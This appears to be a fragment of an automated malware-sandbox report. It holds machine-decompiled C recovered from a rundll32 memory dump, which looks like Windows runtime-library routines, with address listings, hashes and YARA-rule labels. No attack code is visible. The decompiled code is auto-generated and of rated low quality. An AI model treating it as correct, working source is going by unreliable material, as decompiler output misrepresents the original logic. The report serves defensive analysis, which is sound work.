                                                                                                                • Instruction Fuzzy Hash: EBA1CF71F006458FEF25DF65C450BAAB3A4FB48B19F04456FE9069B791EB34F80A8B80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04402D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 63%
                                                                                                                			E04402D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x44f5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x44f7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E044497C0();
				}
				if( *0x44f79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x44f79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04431624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04427D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0449FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04449520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0443E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0445DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x44f6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x44f6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04449980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E044495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04427D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04427D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04487016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0449FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x44f5350;
							if(_t109 != 0x44f5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0449FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04495720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                0x04402d8a
                                                                                                                0x04402d8a
                                                                                                                0x04402d92
                                                                                                                0x04402d96
                                                                                                                0x04402d9e
                                                                                                                0x04402da0
                                                                                                                0x04402da3
                                                                                                                0x04402da5
                                                                                                                0x04402da8
                                                                                                                0x04402dab
                                                                                                                0x04402db2
                                                                                                                0x0445f9aa
                                                                                                                0x0445f9ab
                                                                                                                0x0445f9ae
                                                                                                                0x0445f9ae
                                                                                                                0x04402db8
                                                                                                                0x04402dc2
                                                                                                                0x0445f9b9
                                                                                                                0x0445f9be
                                                                                                                0x0445f9bf
                                                                                                                0x0445f9bf
                                                                                                                0x04402dcf
                                                                                                                0x0445f9c9
                                                                                                                0x04402dd5
                                                                                                                0x04402dd5
                                                                                                                0x04402dd5
                                                                                                                0x04402dde
                                                                                                                0x04402de1
                                                                                                                0x04402e70
                                                                                                                0x04402e72
                                                                                                                0x04402e72
                                                                                                                0x04402de7
                                                                                                                0x04402deb
                                                                                                                0x04402e7c
                                                                                                                0x04402e83
                                                                                                                0x04402e85
                                                                                                                0x04402e8b
                                                                                                                0x04402e8d
                                                                                                                0x04402e92
                                                                                                                0x04402e92
                                                                                                                0x04402e85
                                                                                                                0x04402df1
                                                                                                                0x04402df7
                                                                                                                0x04402df9
                                                                                                                0x04402df9
                                                                                                                0x04402dfc
                                                                                                                0x04402dff
                                                                                                                0x04402e02
                                                                                                                0x00000000
                                                                                                                0x04402e05
                                                                                                                0x04402e0c
                                                                                                                0x0445f9d9
                                                                                                                0x04402e12
                                                                                                                0x04402e12
                                                                                                                0x04402e12
                                                                                                                0x04402e1a
                                                                                                                0x0445f9e3
                                                                                                                0x0445f9e9
                                                                                                                0x0445f9f0
                                                                                                                0x0445f9f6
                                                                                                                0x0445f9f8
                                                                                                                0x0445f9f8
                                                                                                                0x0445f9f0
                                                                                                                0x04402e23
                                                                                                                0x0445fa02
                                                                                                                0x0445fa03
                                                                                                                0x0445fa05
                                                                                                                0x0445fa06
                                                                                                                0x00000000
                                                                                                                0x04402e29
                                                                                                                0x04402e29
                                                                                                                0x04402e2e
                                                                                                                0x04402e34
                                                                                                                0x04402e3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04402e44
                                                                                                                0x04402e47
                                                                                                                0x04402e4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04402e4f
                                                                                                                0x04402e54
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04402e5a
                                                                                                                0x04402e5f
                                                                                                                0x04402e9a
                                                                                                                0x04402ea4
                                                                                                                0x04402ea5
                                                                                                                0x04402ea8
                                                                                                                0x04402eaf
                                                                                                                0x04402eb2
                                                                                                                0x04402eb5
                                                                                                                0x0445fae9
                                                                                                                0x0445faeb
                                                                                                                0x0445faed
                                                                                                                0x0445faef
                                                                                                                0x0445faf7
                                                                                                                0x0445faf8
                                                                                                                0x0445fafd
                                                                                                                0x0445faff
                                                                                                                0x0445fb04
                                                                                                                0x0445fb04
                                                                                                                0x0445faff
                                                                                                                0x04402ec0
                                                                                                                0x04402ec4
                                                                                                                0x04402ec6
                                                                                                                0x04402ec8
                                                                                                                0x0445fb14
                                                                                                                0x0445fb18
                                                                                                                0x0445fb1e
                                                                                                                0x0445fb21
                                                                                                                0x0445fb21
                                                                                                                0x04402ece
                                                                                                                0x04402ece
                                                                                                                0x04402ece
                                                                                                                0x04402ed7
                                                                                                                0x04402e61
                                                                                                                0x04402e63
                                                                                                                0x0445fa6b
                                                                                                                0x0445fa71
                                                                                                                0x0445fa76
                                                                                                                0x0445fa78
                                                                                                                0x0445fa8a
                                                                                                                0x0445fa7a
                                                                                                                0x0445fa83
                                                                                                                0x0445fa83
                                                                                                                0x0445fa8f
                                                                                                                0x0445fa91
                                                                                                                0x0445fa97
                                                                                                                0x0445fa9d
                                                                                                                0x0445faa4
                                                                                                                0x0445faaa
                                                                                                                0x0445faaf
                                                                                                                0x0445fab1
                                                                                                                0x0445fac3
                                                                                                                0x0445fab3
                                                                                                                0x0445fabc
                                                                                                                0x0445fabc
                                                                                                                0x0445fac8
                                                                                                                0x0445facb
                                                                                                                0x0445fadf
                                                                                                                0x0445fadf
                                                                                                                0x0445facb
                                                                                                                0x0445faa4
                                                                                                                0x0445fa91
                                                                                                                0x04402e6f
                                                                                                                0x04402e6f
                                                                                                                0x04402e5f
                                                                                                                0x0445fa13
                                                                                                                0x0445fa15
                                                                                                                0x0445fa17
                                                                                                                0x0445fa1f
                                                                                                                0x0445fa21
                                                                                                                0x0445fa22
                                                                                                                0x0445fa25
                                                                                                                0x0445fa28
                                                                                                                0x0445fa2f
                                                                                                                0x0445fa2f
                                                                                                                0x0445fa2a
                                                                                                                0x0445fa2a
                                                                                                                0x0445fa2a
                                                                                                                0x0445fa31
                                                                                                                0x0445fa34
                                                                                                                0x0445fa36
                                                                                                                0x0445fa3c
                                                                                                                0x0445fa3e
                                                                                                                0x0445fa41
                                                                                                                0x0445fa43
                                                                                                                0x0445fa45
                                                                                                                0x0445fa45
                                                                                                                0x0445fa41
                                                                                                                0x0445fa3c
                                                                                                                0x0445fa4a
                                                                                                                0x0445fa4f
                                                                                                                0x0445fa51
                                                                                                                0x0445fa53
                                                                                                                0x0445fa56
                                                                                                                0x0445fa5b
                                                                                                                0x0445fa5e
                                                                                                                0x00000000
                                                                                                                0x0445fa5e
                                                                                                                0x04402e23

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Re-Waiting
                                                                                                                • API String ID: 0-316354757
                                                                                                                • Opcode ID: 2c8740eacd8fc9b4f7946bf860ae98b9dd087afed25bb735f89e2bb2a7eb585a
                                                                                                                • Instruction ID: d3bcfe16318bdddedb9b4943f940dabdbb69aa68e89eecf00eea717c3428d0fe
                                                                                                                • Opcode Fuzzy Hash: 2c8740eacd8fc9b4f7946bf860ae98b9dd087afed25bb735f89e2bb2a7eb585a
                                                                                                                • Instruction Fuzzy Hash: 9461F071A00604ABEF31DF68C848B6FB7A5FB44718F1442ABE811973D2D7B4BD059792
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E044D0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E044CFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E044D1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04449730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E044CA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E044CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x44f8b04 >> 0x14) + (_v44 -  *0x44f8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04427D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E044C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04427D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E044BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x44f8724 & 0x00000008) != 0) {
						E044C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E044D15B5(0x44f8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                0x044d0eb7
                                                                                                                0x044d0eb9
                                                                                                                0x044d0ec0
                                                                                                                0x044d0ec2
                                                                                                                0x044d0ecd
                                                                                                                0x044d105b
                                                                                                                0x044d105b
                                                                                                                0x044d1061
                                                                                                                0x044d1066
                                                                                                                0x044d1066
                                                                                                                0x044d106b
                                                                                                                0x044d1073
                                                                                                                0x044d1073
                                                                                                                0x044d0ed3
                                                                                                                0x044d0ed6
                                                                                                                0x044d0edc
                                                                                                                0x044d0ee0
                                                                                                                0x044d0ee7
                                                                                                                0x044d0ef0
                                                                                                                0x044d0ef5
                                                                                                                0x044d0efa
                                                                                                                0x044d0efc
                                                                                                                0x044d0efd
                                                                                                                0x044d0f03
                                                                                                                0x044d0f04
                                                                                                                0x044d0f06
                                                                                                                0x044d0f07
                                                                                                                0x044d0f09
                                                                                                                0x044d0f0e
                                                                                                                0x044d0f14
                                                                                                                0x044d0f23
                                                                                                                0x044d0f2d
                                                                                                                0x044d0f34
                                                                                                                0x044d0f34
                                                                                                                0x044d0f14
                                                                                                                0x044d0f52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d0f58
                                                                                                                0x044d0f73
                                                                                                                0x044d0f74
                                                                                                                0x044d0f79
                                                                                                                0x044d0f7d
                                                                                                                0x044d0f80
                                                                                                                0x044d0f86
                                                                                                                0x044d0fab
                                                                                                                0x044d0fb5
                                                                                                                0x044d0fc6
                                                                                                                0x044d0fd1
                                                                                                                0x044d0fe3
                                                                                                                0x044d0fd3
                                                                                                                0x044d0fdc
                                                                                                                0x044d0fdc
                                                                                                                0x044d0feb
                                                                                                                0x044d1009
                                                                                                                0x044d1009
                                                                                                                0x044d1015
                                                                                                                0x044d1027
                                                                                                                0x044d1017
                                                                                                                0x044d1020
                                                                                                                0x044d1020
                                                                                                                0x044d102f
                                                                                                                0x044d103c
                                                                                                                0x044d103c
                                                                                                                0x044d1048
                                                                                                                0x044d1050
                                                                                                                0x044d1050
                                                                                                                0x044d1055
                                                                                                                0x00000000
                                                                                                                0x044d1055
                                                                                                                0x044d0f88
                                                                                                                0x044d0f9e
                                                                                                                0x044d0fa2
                                                                                                                0x044d0fa9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044d0fa9
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: fd919cae8d88e08e3aea9dea64cf063275a36fd713692b4983bb124c4823401c
                                                                                                                • Instruction ID: c15c400b366ad36f5c4d98d76865a3713213ae581bf8820a2256515801adb283
                                                                                                                • Opcode Fuzzy Hash: fd919cae8d88e08e3aea9dea64cf063275a36fd713692b4983bb124c4823401c
                                                                                                                • Instruction Fuzzy Hash: E051DF702083419FEB25EF29D994B1BB7E5EBC4308F14492EF98697691D770F806CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0443F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04424120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04449830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04449990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E044495D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x352bd01a
							_t109 = L04424620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000352b
								E0444F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000352b
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E044495D0();
										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                0x0443f0d3
                                                                                                                0x0443f0d9
                                                                                                                0x0443f0e0
                                                                                                                0x0443f0e7
                                                                                                                0x0443f0f2
                                                                                                                0x0443f0f4
                                                                                                                0x0443f0f8
                                                                                                                0x0443f100
                                                                                                                0x0443f108
                                                                                                                0x0443f10d
                                                                                                                0x0443f115
                                                                                                                0x0443f116
                                                                                                                0x0443f11f
                                                                                                                0x0443f123
                                                                                                                0x0443f124
                                                                                                                0x0443f12c
                                                                                                                0x0443f130
                                                                                                                0x0443f134
                                                                                                                0x0443f13d
                                                                                                                0x0443f144
                                                                                                                0x0443f14b
                                                                                                                0x0443f152
                                                                                                                0x0447bab0
                                                                                                                0x0447bab0
                                                                                                                0x0443f158
                                                                                                                0x0443f158
                                                                                                                0x0443f15a
                                                                                                                0x0443f160
                                                                                                                0x0443f165
                                                                                                                0x0443f166
                                                                                                                0x0443f16f
                                                                                                                0x0443f173
                                                                                                                0x0447baa7
                                                                                                                0x0447baa7
                                                                                                                0x0447baab
                                                                                                                0x00000000
                                                                                                                0x0443f179
                                                                                                                0x0443f179
                                                                                                                0x0443f18d
                                                                                                                0x0443f191
                                                                                                                0x0447baa2
                                                                                                                0x00000000
                                                                                                                0x0443f197
                                                                                                                0x0443f19b
                                                                                                                0x0443f1a2
                                                                                                                0x0443f1a9
                                                                                                                0x0443f1af
                                                                                                                0x0443f1b2
                                                                                                                0x0443f1b6
                                                                                                                0x0443f1b9
                                                                                                                0x0443f1c0
                                                                                                                0x0443f1c4
                                                                                                                0x0443f1d8
                                                                                                                0x0443f1df
                                                                                                                0x0443f1e3
                                                                                                                0x0443f1e6
                                                                                                                0x0443f1eb
                                                                                                                0x0443f1ee
                                                                                                                0x0443f1f4
                                                                                                                0x0443f20f
                                                                                                                0x0447bab7
                                                                                                                0x0447babb
                                                                                                                0x0447bacc
                                                                                                                0x0447bad1
                                                                                                                0x0443f215
                                                                                                                0x0443f218
                                                                                                                0x0443f226
                                                                                                                0x0443f22b
                                                                                                                0x00000000
                                                                                                                0x0443f22b
                                                                                                                0x0443f1f6
                                                                                                                0x0443f1f6
                                                                                                                0x0443f1f9
                                                                                                                0x0443f1fb
                                                                                                                0x0443f1fb
                                                                                                                0x0443f1f4
                                                                                                                0x0443f191
                                                                                                                0x0443f173
                                                                                                                0x0443f152
                                                                                                                0x0443f203

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction ID: c0c64264a61e68ec567395d7133df1a8b89dc9e2b132cb017cb18b5337c96ad0
                                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction Fuzzy Hash: F65190715047109FD720DF29C840A67BBF4FF88714F008A2EF99597650E7B4E905CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04483540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E04483540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x44fd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04440BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04483706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0444FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04483540;
						E0444FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0445DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04490C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E044497C0();
					}
					return E0444B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04483971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04483884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0444FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04449650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04483787(_a4,  &_v352, _t80);
						}
					}
					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E044495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                0x04483552
                                                                                                                0x0448355a
                                                                                                                0x0448355d
                                                                                                                0x04483566
                                                                                                                0x04483567
                                                                                                                0x0448357e
                                                                                                                0x0448358f
                                                                                                                0x044835a1
                                                                                                                0x044835a5
                                                                                                                0x0448366b
                                                                                                                0x0448366b
                                                                                                                0x0448366d
                                                                                                                0x04483672
                                                                                                                0x04483679
                                                                                                                0x04483685
                                                                                                                0x0448368d
                                                                                                                0x0448369d
                                                                                                                0x044836a7
                                                                                                                0x044836b8
                                                                                                                0x044836c6
                                                                                                                0x044836c7
                                                                                                                0x044836dc
                                                                                                                0x044836e1
                                                                                                                0x044836e7
                                                                                                                0x044836e9
                                                                                                                0x044836e9
                                                                                                                0x04483703
                                                                                                                0x04483703
                                                                                                                0x044835b5
                                                                                                                0x044835c0
                                                                                                                0x044835c4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044835ca
                                                                                                                0x044835d7
                                                                                                                0x044835e2
                                                                                                                0x044835e6
                                                                                                                0x044835e8
                                                                                                                0x044835f5
                                                                                                                0x044835fa
                                                                                                                0x04483603
                                                                                                                0x04483604
                                                                                                                0x04483609
